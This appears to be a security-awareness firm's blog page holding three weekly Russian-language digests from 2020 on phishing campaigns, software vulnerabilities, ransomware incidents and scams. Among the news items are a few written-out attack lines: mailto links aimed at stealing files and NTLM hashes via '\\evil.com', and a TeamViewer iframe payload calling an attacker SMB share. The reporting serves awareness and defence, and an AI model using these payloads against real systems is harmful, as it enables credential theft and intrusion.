Ctrl + ↑ Позднее

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 14 по 20 августа 2020 года


Андрей Жаркевич
редактор


Артемий Богданов
технический директор


Сергей Волдохин
выпускающий редактор

Вредоносные кампании

В рамках новой фишинговой кампании от имени ФНС киберпреступники распространяют ПО для удаленного управления компьютером.

  1. Жертве приходит письмо с адреса info@nalog.ru
  2. На самом деле письма рассылались с публичных почтовых сервисов, технические заголовки были подделаны.
  3. Жертве предлагалось явиться в «Главное Управление ФНС России» для «дачи показаний по движению денежных средств», а также распечатать и заполнить документы, находящиеся во вложении к письму. В случае неповиновения, отправитель «обещал» санкции, предусмотренные УК РФ.
  4. Ни организации, фигурирующей в подписи к письму, ни сотрудников, от имени которых были отправлены эти сообщения, не существует.
  5. Во вложении к поддельному письму находился архив «zapros-dokumentov.rar», в котором был другой запароленный архив и текстовый файл с паролем от него.
  6. При открытии архива на компьютер жертвы загружалась легитимная программа для удалённого администрирования и управления компьютером, RMS (Remote Manipulator System), модифицированная так, что при запуске исполняемого файла преступники получали полный удаленный контроль над рабочей станцией.

Организаторы новой вредоносной кампании Duri используют техники HTML smuggling и BLOB-объекты для загрузки вредоносного ПО в обход решений безопасности.

Работа межсетевых экранов, прокси-серверов и песочниц базируется на изучении файловых объектов, например, исполняемых файлов, архивов и других потенциально вредоносных типов.

Организаторы Duri используют генерируют полезную нагрузку «на лету», загружая файлы непосредственно из браузера с помощью техники HTML smuggling, представляющую собой комбинацию JavaScript, HTML5 и data: URL. Поскольку вся полезная нагрузка собирается в браузере на стороне клиента, никакие объекты не передаются в песочницу для проверки.

Обнаружена новая фишинговая кампания обновленного трояна IcedID, получившего новые функции для маскировки и обхода защитных решений.

Вредонос рассылался со взломанных учетных записей сотрудников PrepNow.com. Жертва получала фишинговое письмо от бухгалтерии со вложенным «счётом». На самом деле документ представлял собой защищенный паролем вредоносный ZIP-файл. Запароленный архив успешно обходил антивирусные решения, при этом пользователь мог открыть архив, поскольку пароль был указан в письме.
Злоумышленники также применили различные варианты обфускации слова «attached» («приложенный») в письме, чтобы обойти спам-фильтры, настроенные на выявление массовых спам-кампаний.
Для обхода спам-фильтров Gmail злоумышленники с помощью Unicode-символов развернули задом-наперед имя файла внутри ZIP-файла

Уязвимости и атаки

Некоторые клиенты электронной почты содержат уязвимость, которая может привести к хищению локальных файлов.

Причина проблемы в том, как в уязвимых приложениях реализован стандарт RFC6068, описывающий URI-схему mailto. Нажатие на такие ссылки приводит к открытию нового окна для составления электронного письма. Согласно RFC6068, ссылки mailto могут поддерживать различные параметры, которые могут использоваться для предварительного заполнения полей нового письма.

Например, ссылка вида

<a href="mailto:bob@host.com?Subject=Hello&body=Friend">Click me!</a>

откроет новое окно для создания письма, в котором адрес электронной почты получателя будет bob@host.com, темой будет значиться «Hello», а текст будет начинаться с «Friend». В соответствии с RFC6068 ссылка mailto может иметь параметр attach или attachment, который позволяет открывать окна создания нового письма с уже вложенным файлом.

Злоумышленник может отправить жертве письмо, содержащее замаскированные ссылки mailto, или разместить такие ссылки на сайте. При нажатии на них к письму автоматически добавится конфиденциальный файл. Если пользователь не заметит прикрепленный файл, атакующий может получить конфиденциальные данные, включая ключи SSH и PGP, файлы конфигурации, файлы криптовалютных кошельков, пароли или важные бизнес-документы при условии, что пути для этих файлов известных.

Возможные сценарии такой атаки:

  • использование точных путей к нужным файлам;
  • использование знаков «*» для кражи сразу нескольких файлов;
  • использование URL-адресов для внутренних сетевых ресурсов (\\company_domain\file );
  • использование URL-адресов, приводящих жертву на SMB-сервер злоумышленника, из-за чего у жертвы утекает хэш NTLM (\\evil.com\dummyfile);
  • использование IMAP-ссылок для кражи всей электронной почты из IMAP-ящика пользователя (imap:///fetch>UID>/INBOX).

Из 20 проверенных почтовых клиентов четыре оказались уязвимы перед атаками через ссылки mailto:

  • Evolution, дефолтный почтовый клиент GNOME (CVE-2020-11879);
  • KMail, дефолтный почтовый клиент KDE (CVE-2020-11880);
  • IBM/HCL Notes для Windows (CVE-2020-4089);
  • старые версии Thunderbird для Linux.

Инциденты

В открытом доступе обнаружена база данных, содержащая данные 235 млн профилей пользователей Instagram, TikTok и YouTube.

Пример данных о профиле Instagram, содержащихся в базе.

Найденная БД принадлежит компании Deep Social, которую в 2018 году забанили на площадке Facebook за недобросовестны сбор данных профилей пользователей.

Содержимое базы делится на несколько блоков:

  • 96 млн записей о пользователях Instagram,
  • ещё 95 млн записей с данными Instagram-пользователей,
  • 42 млн записей о пользователях TikTok,
  • около 4 млн записей о пользователях Youtube.

Записи содержат следующую информацию:

  • Имя профиля,
  • Полное имя пользователя,
  • Фото профиля,
  • Описание профиля,
  • Категория профиля — бизнес или реклама,
  • Статистика по подписчикам — количество, частота подписок, скорость роста, половая принадлежность аудитории, возраст и страна, а также количество лайков;
  • Дата последней публикации,
  • Возраст,
  • Пол.

Около 20% записей также содержали телефонный номер владельца аккаунта и адрес его электронной почты.

Крупнейший круизный оператор Carnival Corporation пострадал от кибератаки, в результате которой оказались похищены данные клиентов компании.

В ходе атаки 15 августа злоумышленники проникли в сеть компании с помощью уязвимости CVE-2019-19781 на серверах Citrix, загрузили вымогательское ПО, зашифровали часть информационных систем одного из брендов компании и скачали внутренние файлы.

Работа сервисов холдинга Konica Minolta была нарушена в течение недели из-за кибератаки с использованием программы-вымогателя.

Начиная с 30 июля пользователи не могли зайти на портал поддержки MyKMBS. Они получали сообщение, что сервис временно недоступен без указания причины сбоя. Сайт не работал около недели.

По данным некоторых источников компания стала жертвой нового шифровальщика RansomEXX. В результате атаки файлы на устройствах Konica Minolta оказались зашифрованы. Пока неизвестно, какую сумму потребовали преступники за восстановление доступа к файлам, а также какие действия предприняла в ответ компания.

Очередной жертвой вымогателя-шифровальщика REvil (Sodinokibi) стала компания Brown-Forman Corporation, которой принадлежат такие бренды как Jack Daniel’s и Finlandia.

Преступникам удалось похитить 1 ТБ конфиденциальных данных из сети компании, среди которых были сведения о сотрудниках, контрактах, финансовых документах и внутренней корреспонденции. Хакеры заявили, изучали внутреннюю компьютерную инфраструктуру компании в течение месяца.

В качестве доказательства взлома киберпреступники опубликовали фрагменты похищенных документов и скриншоты,папок,с украденными файлами.

Представители компании Brown-Forman признали факт кибератаки, однако сообщили, что шифрование систем удалось предотвратить. Сумма требуемого выкупа не указывается. В переговоры со злоумышленниками Brown-Forman не вступает.

Посетители ресторана отеля Ritz в Лондоне стали жертвами мошенников, которые выманивали у них данные банковских карт.

Когда клиент отеля делал заказ в ресторане, злоумышленники звонили ему по телефону, представлялись сотрудниками отеля, в точности повторяли сделанный заказ и просили подтвердить платежные данные. Когда жертва сообщала эту информацию, мошенники пытались оформить заказы по каталогу товаров Argos.

Пока неизвестно, как злоумышленники узнавали заказы клиентов Ritz и как им удавалось звонить клиентам с настоящего телефонного номера Ritz.

О компании «Антифишинг»
Наша платформа помогает обучить сотрудников, измерять и тренировать их навыки с помощью имитированных атак. Ведём исследования, используем собственную методологию, создаем реалистичные сценарии и актуальные примеры мошенничества для тренировки навыков.

Заполните форму на сайте или напишите нам, чтобы обучить и проверить своих сотрудников.
Телеграм-канал Антифишинга
Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.






Представляем новости об актуальных технологиях фишинга и других атаках на человека c 7 по 13 августа 2020 года


Андрей Жаркевич
редактор


Артемий Богданов
технический директор


Сергей Волдохин
выпускающий редактор

Уязвимости и атаки

Современные системы распознавания лиц можно заставить «увидеть» человека там, где его не было.

Реальные и сгенерированные нейросетью изображения

В рамках атаки на систему распознавания лиц с помощью машинного обучения было создано изображение лица, которое для человеческого глаза выглядело как один человек, но для системы распознавания лиц — как совсем другой. Для обмана алгоритма исследователи использовали генеративно-состязательную сеть CycleGAN, которая умеет преобразовывать фотографии из одного стиля в другой, например, сделать что фотография бухты станет похожа на картину художника Клода Моне, а фотография гор летом превратится в зимний пейзаж.

Исследователи обучили CycleGAN на 1500 фотографиях двух руководителей исследования с целью превратить изображение одного руководителя в другого. Созданные нейросетью фотографии вводились в систему распознавания лиц, чтобы проверить, сможет ли она узнать изображенного на них человека. С сотой попытки CycleGAN сгенерировала фотографию человека, который выглядел как один руководитель, но распознавался системой, как другой.

В устройствах Intel обнаружена опасная уязвимость CVE-2020-8708, позволяющая атакующему удалённо повысить привилегии на системе.

Причиной ошибки является некорректная реализация прошивки сервисного процессора Emulex Pilot 3, который отслеживает физическое состояние компьютера, сетевого сервера и другого аппаратного обеспечения с помощью специальных датчиков.

Обход аутентификации даёт злоумышленнику доступ к KVM-консоли сервера, с которой он может осуществлять мониторинг и управлять функциями сетевых устройств. Для эксплуатации проблемы атакующий должен находиться в том же сегменте сети, что и уязвимый сервер.

Выяснилось, что уязвимости Meltdown и Foreshadow в процессорах вызваны спекулятивным разыменованием регистров пользовательского пространства в ядре, и затрагивают не только процессоры Intel, но и ряд современных процессоров ARM, IBM и AMD.

По словам специалистов, эффект упреждающей выборки не имеет отношения ни к инструкции по предварительной загрузке кода, ни к аппаратному эффекту упреждающей выборки, связанному с доступом к памяти. Он вызван спекулятивным разыменованием регистров пользовательского пространства в ядре.

Новая техника позволяет проэксплуатировать уязвимость Foreshadow на процессоре Intel, несмотря на все установленные патчи, причём теперь можно получить доступ к данным за пределами кэша L1.

Уязвимость в браузерах на базе движка Chromium позволяет злоумышленникам обойти политику защиты контента (Content Security Policy, CSP) на сайтах с целью похищения данных и внедрения вредоносного кода.

Для эксплуатации уязвимости злоумышленник должен получить доступ к web-серверу, чтобы иметь возможность модифицировать используемые им JavaScript-коды. После этого он сможет добавлять в JavaScript-код атрибуты frame-src и child-src, позволяя внедренному коду загрузить и выполнить их, чтобы обойти CSP.

В чипсетах Qualcomm обнаружено более 400 опасных уязвимостей, которые ставят под угрозу почти каждый второй Android-смартфон.

Проблемы обнаружены в цифровых сигнальных процессорах (DSP) платформы Snapdragon, которые ускоряют обработку изображений, аудио- и видеосигналов, а также отвечают за управление энергопотреблением.

С помощью этих уязвимостей злоумышленники могут:

  • извлекать с устройств жертв фотографии, видео, историю звонков и другой контент,
  • подключаться к микрофону и считывать GPS-координаты в режиме реальном времени,
  • загружать вредоносные программы, которые невозможно обнаружить.
  • заставить устройство перестать реагировать на команды, после чего вся информация, хранящаяся на этом телефоне, станет недоступна.

Чтобы воспользоваться уязвимостями хакеру достаточно убедить жертву установить простое безопасное приложение, которое не требует каких-либо разрешений

Новая уязвимость ReVoLTE в протоколе Voice over LTE (VoLTE) может привести к взлому шифрования 4G-звонков.

Схема эксплуатации уязвимости ReVoLTE.

Этот вектор атаки возник из-за того, что операторы сотовой связи часто используют один ключ шифрования для защиты множества 4G-звонков в пределах одной вышки. В результате злоумышленник может записать разговор двух абонентов, использующих для связи 4G, а затем, чтобы получить ключ шифрования, позвонить сам, после чего расшифровать записанный разговор с помощью того же ключа шифрования.

Видео: демонстрация атаки

Уязвимость CVE 2020-13699 в TeamViewer позволяет похитить системный пароль и скомпрометировать систему без взаимодействия с пользователем.

Источником проблем является функция обработки заголовков URI, которая позволяет злоумышленнику использовать URI схему TeamViewer, чтобы заставить установленное на системе жертвы приложение инициировать соединение с подконтрольной атакующему сетевой папкой SMB. При подключении по SMB на сервер злоумышленника будет произведена аутентификация по протоколу NTLMv2, в процессе которой получит имя пользователя и хэшированную версию пароля.

Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL:

iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'.

Эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённый SMB-ресурс. Windows при этом выполнит NTLM-аутентификацию, чем может воспользоваться злоумышленник для выполнения кода.

Мобильная безопасность

Четыре уязвимости в службе «Найти телефон» от компании Samsung позволяли злоумышленникам производить целый ряд действий на взломанном телефоне:

  • получить доступ к SD-карте и создать файл, чтобы перехватывать трафик и передавать на свой сервер,
  • принудительно «откатывать» устройство до заводских настроек,
  • удалять данные,
  • отслеживать местоположение устройства в режиме реального времени,
  • получать звонки и сообщения,
  • блокировать и разблокировать телефон.

Видео: демонстрация эксплуатации уязвимостей

Умные устройства

В Mercedes-Benz E-Class выявили 19 уязвимостей, эксплуатация которых позволила получить доступ к компьютерным системам автомобиля.

Доступ к backend-серверам был получен через eSIM.

Основными источниками проблем оказались телематический блок управления (TCU) и backend-серверы, которые не требовали аутентификации, когда получали запросы от мобильного приложения Mercedes me, с помощью которого пользователи могут удаленно управлять своим автомобилем и контролировать его функции. В результате хакеры, получившие доступ к серверной части, могли управлять любой машиной в Китае.

Получив доступ, потенциальный злоумышленник мог удаленно запирать и отпирать двери машин, открывать и закрывать крышу, активировать звуковой сигнал и свет, а в некоторых случаях даже запускать двигатель авто. Однако взломать или обойти критически важные механизмы безопасности автомобиля не удалось.

Инциденты

Организация SANS Institute, занимающаяся обучением специалистов по кибербезопасности, стала жертвой кибератаки, которая привела к утечке персональных данных 28 тыс. человек. .

Причиной утечки стало фишинговое письмо, полученное одним из сотрудников организации. Не распознав мошенническое письмо, он выполнил действия, которые были указаны в тексте и скомпрометировал свой почтовый аккаунт.

Похищенные данные содержали адрес электронной почты, должность, имя и фамилию, название компании, рабочий телефон, адрес, сферу деятельности и страну проживания лиц, зарегистрированных для участия в SANS Digital Forensics & Incident Response (DFIR) Summit.

Мошенники научились красть у россиян деньги с банковского счета через QR-код.

Вредоносные QR-коды расклеивают на электрических столбах, скамейках, в лифтах, печатают поддельные рекламные листовки от имени магазинов электроники и подбрасывают их в почтовые ящики. Листовки приглашают принять участие в акции, для регистрации в которой необходимо отсканировать QR-код с помощью камеры смартфона. Если жертва сделает это, с её счета списываются деньги.

Автоматическое списание средств теоретически возможно, если в программе-считывателе QR-кода, банковском приложении или мобильной операционной системе имеются уязвимости. Используя их, мошенники смогут получить удаленный доступ к системе и выполнить любую транзакцию автоматически. Однако в реальности гораздо чаще сами пользователи подтверждают перевод средств. Например, мошеннический QR-код может содержать сообщение о переводе денег через мобильный банк, и тогда для отправки средств на счет мошенников достаточно лишь нажать на кнопку отправки.

О компании «Антифишинг»
Наша платформа помогает обучить сотрудников, измерять и тренировать их навыки с помощью имитированных атак. Ведём исследования, используем собственную методологию, создаем реалистичные сценарии и актуальные примеры мошенничества для тренировки навыков.

Заполните форму на сайте или напишите нам, чтобы обучить и проверить своих сотрудников.
Телеграм-канал Антифишинга
Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.






Представляем новости об актуальных технологиях фишинга и других атаках на человека c 31 июля по 6 августа 2020 года


Андрей Жаркевич
редактор


Артемий Богданов
технический директор


Сергей Волдохин
выпускающий редактор

Сайты и мессенджеры

В Chrome Web Store обнаружены 295 вредоносных расширений, внедряющих рекламу в результаты поиска Google и Bing.

Большинство расширений маскировались под блокировщики рекламы и находились по запросам adblock, adguard, ublock, ad blocker. Другая часть вредоносных расширений маскировалась под виджеты прогноза погоды и утилиты для создания скриншотов. В действительности же 245 из 295 расширений не имели никакой полезной функциональности и могли лишь поменять настраиваемый фон для новых вкладок в Chrome.

После установки поддельные расширения загружали на устройства пользователя вредоносный код с домена fly-analytics.com, а затем незаметно внедряли рекламу в поисковую выдачу Google и Bing.

Уязвимости и атаки

Уязвимость в платформе Microsoft Teams позволяет удалённо извлекать и запускать вредоносное ПО, используя поддельный пакет Microsoft Teams с подлинным приложением Update.Exe.

Ранее выпущенный патч для Microsoft Teams добавил в приложение Update.exe проверку переданного ему URL-адреса на предмет наличия строк «http/https», «:», «/» и номеров портов. Однако такое ограничение не помешает злоумышленнику поместить вредоносный файл в общую папку в сети, а затем получить доступ к нему с компьютера жертвы. Для этого достаточно настроить публичный сервер Samba, разместить на нём «полезную нагрузку» и передать её URL апдейтеру Microsoft Teams в виде строки «\\10.10.10.10\pub\xxx.yyy»

Новая атака EtherOops позволяет поразить устройства в корпоративной сети через неисправные Ethernet-кабели.

Метод представляет собой атаку типа «пакет в пакете», при которой сетевые пакеты вложены друг в друга. При этом внешний пакет-оболочка вполне безобиден, зато внутренний содержит вредоносный код или команды. Оказалось, что неисправные Ethernet-кабели способны перемещать биты внутри пакета, медленно разрушая внешний пакет-оболочку. При этом целостность внутреннего пакета сохранится.

Схема атаки:

  1. Злоумышленник с большой скоростью посылает много легитимных пакетов, разрешенных на брандмауэре. Внутри них содержится инкапсулированная полезная нагрузка. Проходя по неисправному Ethernet-кабелю, пакеты могут искажаться из-за случайных битовых ошибок.
  2. Злоумышленник ждёт, пока в заголовке низкоуровневого фрейма Ethernet в пакете не появятся битовые ошибки.
  3. Когда это происходит, Ethernet-контроллер внутри сети интерпретирует «внутренний» пакет с  полезной нагрузкой как совершенно новый пакет, что позволяет злоумышленнику направлять в кадр вредоносные пакеты, которые были бы заблокированы .

Демонстрация атаки EtherOops для обхода межсетевых экранов

Технический разбор атаки EtherOops.

Уязвимость в iOS и macOS позволяла злоумышленнику получить несанкционированный доступ к учетной записи iCloud пользователя.

Проблема была связана с реализацией биометрической функции TouchID или FaceID для аутентификации пользователей при входе на сайты через браузер Safari. При авторизации на сайте через Apple ID с использованием Touch ID пропускается двухфакторная аутентификация, поскольку пользователь уже предъявил комбинацию факторов для идентификации — устройство и свои биометрические данные.

Из-за некорректной настройки задействованный в процессе авторизации сайт gsa.apple.com позволял злоупотреблять доменами для проверки идентификатора клиента без аутентификации. В результате злоумышленник мог использовать уязвимость межсайтового выполнения сценария на любом из поддоменов Apple для запуска вредоносного JavaScript-кода.

Инциденты

Компания Canon стала очередной жертвой вымогательского ПО Maze. Атака нарушила работу нескольких сервисов, среди которых электронная почта, Microsoft Teams, официальный сайт Canon в США и ряд внутренних приложений.

По заявлению операторов Maze им удалось проникнуть в инфраструктуру компании, а затем похитить и зашифровать более 10 Тб данных, среди которых есть и конфиденциальные. Если Canon не заплатит выкуп в течение 7 дней, преступники опубликуют информацию в общем доступе.

Вымогательское сообщение Maze

Судебное заседание по вопросу выхода под залог для Грэма Айвена Кларка (Graham Ivan Clark), которого обвиняют в недавней атаке на Twitter, превратилось в фарс из-за действий Zoom-пранкеров.

Поскольку слушание было публичным, Zoom-конференция не была защищена паролем. При этом по неизвестной причине в настройках не был отключен звук для посетителей, а также им не запрещалось демонстрировать экран.

Небезопасными настройками воспользовались многочисленные пранкеры. Они представлялись сотрудниками CNN и BBC, прерывали заседание криками и громкой музыкой, а потом стали транслировать порно.

Лицо прокурора Эндрю Уоррена, который неожиданно обнаружил на экране порноролик:

Вредоносное ПО

Вымогатель WastedLocker обходит защитные средства, используя легитимный механизм Windows Cache Manager.

Схема работы WastedLocker:

  1. Вредонос открывает файл, выполняет его отображение в память, после чего закрывает файл, не вызывая функцию UnmapViewOfFile.
  2. Отображаемый в память файл попадает в кэш Windows.
  3. Теперь вредонос может спокойно шифровать находящийся в кэше файл, не создавая дисковой активности, которую отслеживают защитные решения.
  4. Менеджер кэша, обнаружив, что отображённый в память файл более «свежий», чем файл на диске, перезаписывает оригинальный файл его зашифрованной версией. При этом операция записи на диск также не вызывает срабатывания антивируса, поскольку её инициирует легитимная системная программа.
О компании «Антифишинг»
Наша платформа помогает обучить сотрудников, измерять и тренировать их навыки с помощью имитированных атак. Ведём исследования, используем собственную методологию, создаем реалистичные сценарии и актуальные примеры мошенничества для тренировки навыков.

Заполните форму на сайте или напишите нам, чтобы обучить и проверить своих сотрудников.
Телеграм-канал Антифишинга
Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.






Ctrl + ↓ Ранее